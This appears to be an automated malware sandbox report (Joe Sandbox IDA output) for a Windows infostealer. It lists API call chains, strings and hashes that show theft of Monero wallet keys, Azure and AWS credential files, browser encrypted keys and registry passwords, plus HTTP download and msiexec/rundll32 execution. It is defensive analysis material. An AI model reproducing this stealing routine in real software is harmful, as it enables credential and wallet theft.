                  • Instruction ID: 272a835775872935f5a1661868ba64dc212b893ac9ce4ca17ac68236ac117ad0
                  • Opcode Fuzzy Hash: f676adba3f6a66a961fda43b87a48df7921222efb60c649885012b0b025b4fa7
                  • Instruction Fuzzy Hash: AA1210718A0119ABEB15EBA0DC95FEEB37CFF64701F914199B10A630A1DF702A49CF61
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 00148B60: GetSystemTime.KERNEL32(00150E1A,01029918,001505AE,?,?,001313F9,?,0000001A,00150E1A,00000000,?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 00148B86
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0013CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0013D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0013D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D208
                  • lstrcat.KERNEL32(?,00151478), ref: 0013D217
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D22A
                  • lstrcat.KERNEL32(?,0015147C), ref: 0013D239
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D24C
                  • lstrcat.KERNEL32(?,00151480), ref: 0013D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D26E
                  • lstrcat.KERNEL32(?,00151484), ref: 0013D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D290
                  • lstrcat.KERNEL32(?,00151488), ref: 0013D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D2B2
                  • lstrcat.KERNEL32(?,0015148C), ref: 0013D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 0013D2D4
                  • lstrcat.KERNEL32(?,00151490), ref: 0013D2E3
                    • Part of subcall function 0014A820: lstrlen.KERNEL32(00134F05,?,?,00134F05,00150DDE), ref: 0014A82B
                    • Part of subcall function 0014A820: lstrcpy.KERNEL32(00150DDE,00000000), ref: 0014A885
                  • lstrlen.KERNEL32(?), ref: 0013D32A
                  • lstrlen.KERNEL32(?), ref: 0013D339
                    • Part of subcall function 0014AA70: StrCmpCA.SHLWAPI(01028A30,0013A7A7,?,0013A7A7,01028A30), ref: 0014AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 0013D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 2a162adc38ce60eef872948f8d07c945b3c0669e48c52889c4fdd8fbba501102
                  • Instruction ID: 2c0ab1dabc1d2c39e10bb5a9a358c2585afac93090f29f3aa6dd251742ee04f7
                  • Opcode Fuzzy Hash: 2a162adc38ce60eef872948f8d07c945b3c0669e48c52889c4fdd8fbba501102
                  • Instruction Fuzzy Hash: C3E16E71940109ABDB15EBA0DD96EEE737CFF64302F510058F106A70A1DF35AE4ACB62
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0102CDF0,00000000,?,0015144C,00000000,?,?), ref: 0013CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0013CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0013CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0013CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0013CAD9
                  • StrStrA.SHLWAPI(?,0102CE50,00150B52), ref: 0013CAF7
                  • StrStrA.SHLWAPI(00000000,0102CF10), ref: 0013CB1E
                  • StrStrA.SHLWAPI(?,0102D0D8,00000000,?,00151458,00000000,?,00000000,00000000,?,01028A20,00000000,?,00151454,00000000,?), ref: 0013CCA2
                  • StrStrA.SHLWAPI(00000000,0102D1D8), ref: 0013CCB9
                    • Part of subcall function 0013C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0013C871
                    • Part of subcall function 0013C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0013C87C
                  • StrStrA.SHLWAPI(?,0102D1D8,00000000,?,0015145C,00000000,?,00000000,01028A00), ref: 0013CD5A
                  • StrStrA.SHLWAPI(00000000,01028960), ref: 0013CD71
                    • Part of subcall function 0013C820: lstrcat.KERNEL32(?,00150B46), ref: 0013C943
                    • Part of subcall function 0013C820: lstrcat.KERNEL32(?,00150B47), ref: 0013C957
                    • Part of subcall function 0013C820: lstrcat.KERNEL32(?,00150B4E), ref: 0013C978
                  • lstrlen.KERNEL32(00000000), ref: 0013CE44
                  • CloseHandle.KERNEL32(00000000), ref: 0013CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: c89375d914e79ba883632fc4e8d51d47ed6a75a9fe510937f9b87a1aee207857
                  • Instruction ID: cd81405bcdcffe35d013cadcd6cade799cd5e6e6068dd8c4e1af4e916c83c4fd
                  • Opcode Fuzzy Hash: c89375d914e79ba883632fc4e8d51d47ed6a75a9fe510937f9b87a1aee207857
                  • Instruction Fuzzy Hash: C3E110B1940109ABEB15EBA0DC91FEEB778EF64305F814159F106771A1EF306A4ACF62
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • RegOpenKeyExA.ADVAPI32(00000000,0102AF40,00000000,00020019,00000000,001505B6), ref: 001483A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00148426
                  • wsprintfA.USER32 ref: 00148459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0014847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0014848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00148499
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 0dd3c5ca9ae6f13d29f1a73aa565c16326521587574dfa9268feaac0bc74773d
                  • Instruction ID: a1f267233b4a802d8eef2a3e308462dd87b7e14f618ed52eeeca7916430cbce4
                  • Opcode Fuzzy Hash: 0dd3c5ca9ae6f13d29f1a73aa565c16326521587574dfa9268feaac0bc74773d
                  • Instruction Fuzzy Hash: 91813BB1950118ABEB29DF54CC91FEEB7B8FF58701F408298E109A6190DF716B89CF91
                  APIs
                    • Part of subcall function 00148DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00148E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00144DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00144DCD
                    • Part of subcall function 00144910: wsprintfA.USER32 ref: 0014492C
                    • Part of subcall function 00144910: FindFirstFileA.KERNEL32(?,?), ref: 00144943
                  • lstrcat.KERNEL32(?,00000000), ref: 00144E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00144E59
                    • Part of subcall function 00144910: StrCmpCA.SHLWAPI(?,00150FDC), ref: 00144971
                    • Part of subcall function 00144910: StrCmpCA.SHLWAPI(?,00150FE0), ref: 00144987
                    • Part of subcall function 00144910: FindNextFileA.KERNEL32(000000FF,?), ref: 00144B7D
                    • Part of subcall function 00144910: FindClose.KERNEL32(000000FF), ref: 00144B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00144EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00144EE5
                    • Part of subcall function 00144910: wsprintfA.USER32 ref: 001449B0
                    • Part of subcall function 00144910: StrCmpCA.SHLWAPI(?,001508D2), ref: 001449C5
                    • Part of subcall function 00144910: wsprintfA.USER32 ref: 001449E2
                    • Part of subcall function 00144910: PathMatchSpecA.SHLWAPI(?,?), ref: 00144A1E
                    • Part of subcall function 00144910: lstrcat.KERNEL32(?,0102E560), ref: 00144A4A
                    • Part of subcall function 00144910: lstrcat.KERNEL32(?,00150FF8), ref: 00144A5C
                    • Part of subcall function 00144910: lstrcat.KERNEL32(?,?), ref: 00144A70
                    • Part of subcall function 00144910: lstrcat.KERNEL32(?,00150FFC), ref: 00144A82
                    • Part of subcall function 00144910: lstrcat.KERNEL32(?,?), ref: 00144A96
                    • Part of subcall function 00144910: CopyFileA.KERNEL32(?,?,00000001), ref: 00144AAC
                    • Part of subcall function 00144910: DeleteFileA.KERNEL32(?), ref: 00144B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: f2294bdd8d8ef634dc5507cd4cffb43e1cd9f250918f34fcec97159fec05d339
                  • Instruction ID: 6535a3fa101f52b4461c5d2bf889481c207145e89f1ef434a9ed789cda42ebba
                  • Opcode Fuzzy Hash: f2294bdd8d8ef634dc5507cd4cffb43e1cd9f250918f34fcec97159fec05d339
                  • Instruction Fuzzy Hash: C24183BA940214B7D760F7B0EC47FED3638AB64701F404458B659660C1EFB45BCD8B92
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0014906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: 38ec6cb678058ea299694c008ddcda0b50fbc4e7fbf5c8680dd9fce1f5b0653e
                  • Instruction ID: c326b929c4536ecf254631d36ffca346321c425d09e6198f1bbc7f7c0d19a6a4
                  • Opcode Fuzzy Hash: 38ec6cb678058ea299694c008ddcda0b50fbc4e7fbf5c8680dd9fce1f5b0653e
                  • Instruction Fuzzy Hash: F771DB71910608EBDB14EBE4DC89FEEB7BDAB88701F108508F51AA7290DB74A945CB61
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 001431C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 0014335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 001434EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 5b878fbbe4d0c6eb1600c2574b26ec533e66ce78d2a8d3c8085ef3cd312c656d
                  • Instruction ID: 6c243f2e80322c3237a2f9fdbd5aed1667856a8861ae1b6a3382f5256eb7577b
                  • Opcode Fuzzy Hash: 5b878fbbe4d0c6eb1600c2574b26ec533e66ce78d2a8d3c8085ef3cd312c656d
                  • Instruction Fuzzy Hash: 0B123371880109AAEB19FBA0DC92FEDB778EF24305F914159F506761A1EF302B4ACF52
                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 00136280: InternetOpenA.WININET(00150DFE,00000001,00000000,00000000,00000000), ref: 001362E1
                    • Part of subcall function 00136280: StrCmpCA.SHLWAPI(?,0102E470), ref: 00136303
                    • Part of subcall function 00136280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00136335
                    • Part of subcall function 00136280: HttpOpenRequestA.WININET(00000000,GET,?,0102DA58,00000000,00000000,00400100,00000000), ref: 00136385
                    • Part of subcall function 00136280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001363BF
                    • Part of subcall function 00136280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001363D1
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00145318
                  • lstrlen.KERNEL32(00000000), ref: 0014532F
                    • Part of subcall function 00148E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00148E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00145364
                  • lstrlen.KERNEL32(00000000), ref: 00145383
                  • lstrlen.KERNEL32(00000000), ref: 001453AE
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: 8393c2d895c0e99551b6e1f7fcac02f253d554ad5aad35ed94a3eccfe525e9be
                  • Instruction ID: 53729c6094a3f5f17a93d30532a3bcf99e9f5e1b2b8dff15b3a8cba6d22f787e
                  • Opcode Fuzzy Hash: 8393c2d895c0e99551b6e1f7fcac02f253d554ad5aad35ed94a3eccfe525e9be
                  • Instruction Fuzzy Hash: 38513170950149EBDB18FF60CD92AED7779EF60305F914018F80A5B5A2EF346B46CBA2
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 8bc0e9e0680f8dcff002290b95d739dec837428138d2678031f3479859bd6bd7
                  • Instruction ID: 0a1881e1e4c0ce79a018cd5bb1cdd6200ef93e878b3e04a28637ab99aaa063b8
                  • Opcode Fuzzy Hash: 8bc0e9e0680f8dcff002290b95d739dec837428138d2678031f3479859bd6bd7
                  • Instruction Fuzzy Hash: 1DC175B594011DABCB14EF60DC89FEE7379BFA4304F104598F50AA7251DB70AA85CF91
                  APIs
                    • Part of subcall function 00148DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00148E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 001442EC
                  • lstrcat.KERNEL32(?,0102DF80), ref: 0014430B
                  • lstrcat.KERNEL32(?,?), ref: 0014431F
                  • lstrcat.KERNEL32(?,0102CF28), ref: 00144333
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 00148D90: GetFileAttributesA.KERNEL32(00000000,?,00131B54,?,?,0015564C,?,?,00150E1F), ref: 00148D9F
                    • Part of subcall function 00139CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00139D39
                    • Part of subcall function 001399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001399EC
                    • Part of subcall function 001399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00139A11
                    • Part of subcall function 001399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00139A31
                    • Part of subcall function 001399C0: ReadFile.KERNEL32(000000FF,?,00000000,0013148F,00000000), ref: 00139A5A
                    • Part of subcall function 001399C0: LocalFree.KERNEL32(0013148F), ref: 00139A90
                    • Part of subcall function 001399C0: CloseHandle.KERNEL32(000000FF), ref: 00139A9A
                    • Part of subcall function 001493C0: GlobalAlloc.KERNEL32(00000000,001443DD,001443DD), ref: 001493D3
                  • StrStrA.SHLWAPI(?,0102DF20), ref: 001443F3
                  • GlobalFree.KERNEL32(?), ref: 00144512
                    • Part of subcall function 00139AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139AEF
                    • Part of subcall function 00139AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00134EEE,00000000,?), ref: 00139B01
                    • Part of subcall function 00139AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139B2A
                    • Part of subcall function 00139AC0: LocalFree.KERNEL32(?,?,?,?,00134EEE,00000000,?), ref: 00139B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 001444A3
                  • StrCmpCA.SHLWAPI(?,001508D1), ref: 001444C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 001444D2
                  • lstrcat.KERNEL32(00000000,?), ref: 001444E5
                  • lstrcat.KERNEL32(00000000,00150FB8), ref: 001444F4
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 0aec86e0198da73ac8a947522025f3145f89156edd1511948ec17f73a3e7b743
                  • Instruction ID: 360bed47d88284c50d62f6d70ccbbcebce0fdcb2053b7490a374f46191eff487
                  • Opcode Fuzzy Hash: 0aec86e0198da73ac8a947522025f3145f89156edd1511948ec17f73a3e7b743
                  • Instruction Fuzzy Hash: 0C7174B6900608BBDB14EBE0DC85FEE777DAB98301F004598F61997191EB34DB49CB92
                  APIs
                    • Part of subcall function 001312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001312B4
                    • Part of subcall function 001312A0: RtlAllocateHeap.NTDLL(00000000), ref: 001312BB
                    • Part of subcall function 001312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001312D7
                    • Part of subcall function 001312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001312F5
                    • Part of subcall function 001312A0: RegCloseKey.ADVAPI32(?), ref: 001312FF
                  • lstrcat.KERNEL32(?,00000000), ref: 0013134F
                  • lstrlen.KERNEL32(?), ref: 0013135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00131377
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 00148B60: GetSystemTime.KERNEL32(00150E1A,01029918,001505AE,?,?,001313F9,?,0000001A,00150E1A,00000000,?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 00148B86
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00131465
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001399EC
                    • Part of subcall function 001399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00139A11
                    • Part of subcall function 001399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00139A31
                    • Part of subcall function 001399C0: ReadFile.KERNEL32(000000FF,?,00000000,0013148F,00000000), ref: 00139A5A
                    • Part of subcall function 001399C0: LocalFree.KERNEL32(0013148F), ref: 00139A90
                    • Part of subcall function 001399C0: CloseHandle.KERNEL32(000000FF), ref: 00139A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 001314EF
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: b3b11a0b5b041cb0a1e642b4f12dd3d2330aad6a986c5a5d6b34824266675d77
                  • Instruction ID: 1fa33b9136c0abdf12eee73a7ae4e81db3281336fa751c6cf5c7f047dc35aa8c
                  • Opcode Fuzzy Hash: b3b11a0b5b041cb0a1e642b4f12dd3d2330aad6a986c5a5d6b34824266675d77
                  • Instruction Fuzzy Hash: 1F5146B1D9011997DB15FB60DD92BED733CEF64305F814198B60A62092EF305B89CBA6
                  APIs
                    • Part of subcall function 001372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0013733A
                    • Part of subcall function 001372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001373B1
                    • Part of subcall function 001372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0013740D
                    • Part of subcall function 001372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00137452
                    • Part of subcall function 001372D0: HeapFree.KERNEL32(00000000), ref: 00137459
                  • lstrcat.KERNEL32(00000000,001517FC), ref: 00137606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00137648
                  • lstrcat.KERNEL32(00000000, : ), ref: 0013765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 0013768F
                  • lstrcat.KERNEL32(00000000,00151804), ref: 001376A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 001376D3
                  • lstrcat.KERNEL32(00000000,00151808), ref: 001376ED
                  • task.LIBCPMTD ref: 001376FB
                  Strings
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: 0eb1667a05e43f717311bb27b40eb5b598e0f02a04747e763e215f809cfdf3b4
                  • Instruction ID: dd5e615c753874be8384886eb0fe1dc7fc66eca9afc0f181ea93f50d1e8d724a
                  • Opcode Fuzzy Hash: 0eb1667a05e43f717311bb27b40eb5b598e0f02a04747e763e215f809cfdf3b4
                  • Instruction Fuzzy Hash: 1E3150B1900509EFCB29EBE4DC56EFF7778BB94302F104118F116A7290DB34A986CB52
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0102DD70,00000000,?,00150E2C,00000000,?,00000000), ref: 00148130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00148137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00148158
                  • __aulldiv.LIBCMT ref: 00148172
                  • __aulldiv.LIBCMT ref: 00148180
                  • wsprintfA.USER32 ref: 001481AC
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 442d42bedb3ed296bdec53bd6b89c1da400e142e170f7c8474c523099f196714
                  • Instruction ID: 48b1e7334e51ecdc54b07fb1bbf6b29cc0ee087c1830487d6699a4173f90edaa
                  • Opcode Fuzzy Hash: 442d42bedb3ed296bdec53bd6b89c1da400e142e170f7c8474c523099f196714
                  • Instruction Fuzzy Hash: 65215CB1E44608ABDB10DFD4DC49FAFBBB8FB44B04F204209F605BB290C77869018BA5
                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00134839
                    • Part of subcall function 001347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00134849
                  • InternetOpenA.WININET(00150DF7,00000001,00000000,00000000,00000000), ref: 0013610F
                  • StrCmpCA.SHLWAPI(?,0102E470), ref: 00136147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0013618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001361B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 001361DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0013620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00136249
                  • InternetCloseHandle.WININET(?), ref: 00136253
                  • InternetCloseHandle.WININET(00000000), ref: 00136260
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 51ee8385ae17ae5db7b10c580a2eb4ba799b3a8b1cef7f1e908014fbdc588643
                  • Instruction ID: a9f40e8904d1fdb7ff34cedb237bd74aab06b6cbc149e48d8f82fec3ccbbc6ec
                  • Opcode Fuzzy Hash: 51ee8385ae17ae5db7b10c580a2eb4ba799b3a8b1cef7f1e908014fbdc588643
                  • Instruction Fuzzy Hash: 1C5171B1940218ABEB24DF90DC45BEE77B8FF44705F118098B609A71C1DB74AA85CFA5
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0013733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001373B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0013740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00137452
                  • HeapFree.KERNEL32(00000000), ref: 00137459
                  • task.LIBCPMTD ref: 00137555
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  • Opcode ID: bb770ac6e5db9d2f6d24b84d644f3c1403fa5de7d832148918a133d6019cd086
                  • Instruction ID: daba80701830ba63580a8eb11815c60047e14465e48efbe206c55e1ca6a1eb6c
                  • Opcode Fuzzy Hash: bb770ac6e5db9d2f6d24b84d644f3c1403fa5de7d832148918a133d6019cd086
                  • Instruction Fuzzy Hash: 08611EB590425C9BDB24DB50DD45BDAB7B8BF58300F0081E9F689A6181DB706FC9CF91
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                  • lstrlen.KERNEL32(00000000), ref: 0013BC9F
                    • Part of subcall function 00148E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00148E52
